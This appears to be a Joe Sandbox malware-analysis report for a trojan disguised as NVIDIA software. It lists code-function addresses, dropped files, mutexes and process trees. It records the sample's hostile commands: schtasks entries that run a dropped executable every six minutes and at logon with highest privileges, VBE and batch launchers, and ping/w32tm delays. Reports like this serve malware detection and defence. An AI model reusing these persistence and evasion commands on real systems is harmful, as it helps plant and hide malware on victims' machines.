                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 12_2_00007FF848F2CDE512_2_00007FF848F2CDE5
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 12_2_00007FF848F2CC0A12_2_00007FF848F2CC0A
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 12_2_00007FF848F2D08D12_2_00007FF848F2D08D
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 12_2_00007FF8490EF04212_2_00007FF8490EF042
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 12_2_00007FF8490EDBEA12_2_00007FF8490EDBEA
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 12_2_00007FF8490E09D212_2_00007FF8490E09D2
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 12_2_00007FF8490ED46D12_2_00007FF8490ED46D
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 12_2_00007FF8490C62F512_2_00007FF8490C62F5
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 12_2_00007FF8490C633512_2_00007FF8490C6335
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 12_2_00007FF84916062B12_2_00007FF84916062B
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 12_2_00007FF8491605A412_2_00007FF8491605A4
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 12_2_00007FF84916057B12_2_00007FF84916057B
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 14_2_00007FF848F6502914_2_00007FF848F65029
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 14_2_00007FF848F5A4C414_2_00007FF848F5A4C4
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 14_2_00007FF848F277F814_2_00007FF848F277F8
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 14_2_00007FF848F1F54314_2_00007FF848F1F543
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 14_2_00007FF848F2B6BD14_2_00007FF848F2B6BD
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 14_2_00007FF848F2CE3214_2_00007FF848F2CE32
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 14_2_00007FF848F2CDE514_2_00007FF848F2CDE5
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 14_2_00007FF848F2CC0A14_2_00007FF848F2CC0A
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 14_2_00007FF848F2D08D14_2_00007FF848F2D08D
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 14_2_00007FF848F10DAC14_2_00007FF848F10DAC
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 19_2_00007FF848F2B6BD19_2_00007FF848F2B6BD
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 19_2_00007FF848F2CE3219_2_00007FF848F2CE32
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 19_2_00007FF848F2CDE519_2_00007FF848F2CDE5
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 19_2_00007FF848F2CC0A19_2_00007FF848F2CC0A
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 19_2_00007FF848F2D08D19_2_00007FF848F2D08D
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 19_2_00007FF848F277F819_2_00007FF848F277F8
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 19_2_00007FF848F6502919_2_00007FF848F65029
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 19_2_00007FF848F5A4C419_2_00007FF848F5A4C4
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 19_2_00007FF848F1F54319_2_00007FF848F1F543
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 19_2_00007FF848F10DAC19_2_00007FF848F10DAC
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 21_2_00007FF848F30DAC21_2_00007FF848F30DAC
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 21_2_00007FF8490E62F521_2_00007FF8490E62F5
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 21_2_00007FF8490E633521_2_00007FF8490E6335
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 21_2_00007FF84918062B21_2_00007FF84918062B
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 21_2_00007FF8491805A421_2_00007FF8491805A4
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 21_2_00007FF84918057B21_2_00007FF84918057B
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 26_2_00007FF848F277F826_2_00007FF848F277F8
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 26_2_00007FF848F2B6BD26_2_00007FF848F2B6BD
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 26_2_00007FF848F2CE3226_2_00007FF848F2CE32
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 26_2_00007FF848F2CDE526_2_00007FF848F2CDE5
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 26_2_00007FF848F2CC0A26_2_00007FF848F2CC0A
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 26_2_00007FF848F2D08D26_2_00007FF848F2D08D
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 26_2_00007FF848F10DAC26_2_00007FF848F10DAC
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 26_2_00007FF848F1F54326_2_00007FF848F1F543
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 26_2_00007FF848F6A46926_2_00007FF848F6A469
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 26_2_00007FF848F5A4C426_2_00007FF848F5A4C4
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 26_2_00007FF848F6502926_2_00007FF848F65029
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 26_2_00007FF8490C62F526_2_00007FF8490C62F5
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 26_2_00007FF8490C633526_2_00007FF8490C6335
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 26_2_00007FF8490EF04226_2_00007FF8490EF042
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 26_2_00007FF8490EDBEA26_2_00007FF8490EDBEA
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 26_2_00007FF8490D9E0826_2_00007FF8490D9E08
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 26_2_00007FF8490E09D226_2_00007FF8490E09D2
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 26_2_00007FF8490ED46D26_2_00007FF8490ED46D
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 26_2_00007FF84916062B26_2_00007FF84916062B
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 26_2_00007FF8491605A426_2_00007FF8491605A4
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 26_2_00007FF84916057B26_2_00007FF84916057B
                                  Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\AAjFTaDk.log 75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: String function: 0101EB78 appears 39 times
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: String function: 0101F5F0 appears 31 times
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: String function: 0101EC50 appears 56 times
                                  Source: GwjbnDUU.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: ShoatPdx.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: IyVKJmYP.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: AVNUZtIi.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: UCVIiXUm.log.12.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: DnVLkBOS.log.12.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: JfykNhTG.log.12.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: zwfUdEOY.log.12.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: qiYwETGO.log.21.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: LxmktYfY.log.21.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: CTevJfQr.log.21.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: skLfaCLK.log.21.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: PszJebvu.log.26.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: cjQhkVuX.log.26.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: TAxSAtpp.log.26.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: IMSbQhuH.log.26.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: chLhgIIs.log.31.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: oSRflUSV.log.31.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: fjyPCrNn.log.31.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: VAeASPIF.log.31.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: snUoPbCy.log.37.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: NBjcEgcI.log.37.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: DSPMVDWa.log.37.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: ukwwlbRt.log.37.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: xYhnoKfH.log.42.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: XwgSVREI.log.42.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: OOMCloya.log.42.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: DaiMBcDs.log.42.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: gzqzblNZ.log.47.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: AOEnQqnj.log.47.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: hxRHxlcT.log.47.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: XOysNJXm.log.47.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: pAbpDGmk.log.52.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: TxJtcnQc.log.52.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: JOqdsLLu.log.52.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: BlhnJSvN.log.52.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: HbFMikPW.log.57.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: TMLKnwYz.log.57.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: JesvDTTS.log.57.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: AAjFTaDk.log.57.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: NVIDIAShare.exe.bin.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs NVIDIAShare.exe.bin.exe
                                  Source: NVIDIAShare.exe.bin.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: NVIDIA Container.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: hBoBqOIwjXsCbkOMEKwZ.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: classification engineClassification label: mal100.troj.evad.winEXE@106/78@1/1
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_01006C74 GetLastError,FormatMessageW,0_2_01006C74
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_0101A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_0101A6C2
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeFile created: C:\Users\user\AppData\Roaming\NVIDIAJump to behavior
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2452:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2520:120:WilError_03
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeMutant created: NULL
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:412:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5384:120:WilError_03
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeMutant created: \Sessions\1\BaseNamedObjects\Local\b11c43509f862efb5e6ac76246280a4e4f539faad6021ed5aa3ed20238541750
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1964:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1292:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4708:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6640:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1488:120:WilError_03
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeFile created: C:\Users\user\AppData\Local\Temp\e5b1d191efd6658c81c1e31a8eff125602419669Jump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\NVIDIA\RbwXTgCxu.bat" "
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCommand line argument: sfxname0_2_0101DF1E
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCommand line argument: sfxstime0_2_0101DF1E
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCommand line argument: STARTDLG0_2_0101DF1E
                                  Source: NVIDIAShare.exe.bin.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: NVIDIAShare.exe.bin.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Windows\System32\Conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeFile read: C:\Windows\win.iniJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                  Source: NVIDIAShare.exe.bin.exeReversingLabs: Detection: 60%
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeFile read: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeJump to behavior
                                  Source: unknownProcess created: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe "C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe"
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\NVIDIA\WRqwjVLhswP6l4C4Fp0FJhl.vbe"
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\NVIDIA\RbwXTgCxu.bat" "
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe "C:\Users\user\AppData\Roaming\NVIDIA/NVIDIA Container.exe"
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "hBoBqOIwjXsCbkOMEKwZh" /sc MINUTE /mo 6 /tr "'C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe'" /f
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "hBoBqOIwjXsCbkOMEKwZ" /sc ONLOGON /tr "'C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe'" /rl HIGHEST /f
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "hBoBqOIwjXsCbkOMEKwZh" /sc MINUTE /mo 6 /tr "'C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe'" /rl HIGHEST /f
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\vPPPhWVNfR.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: unknownProcess created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                  Source: unknownProcess created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1LArpmQ7xZ.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
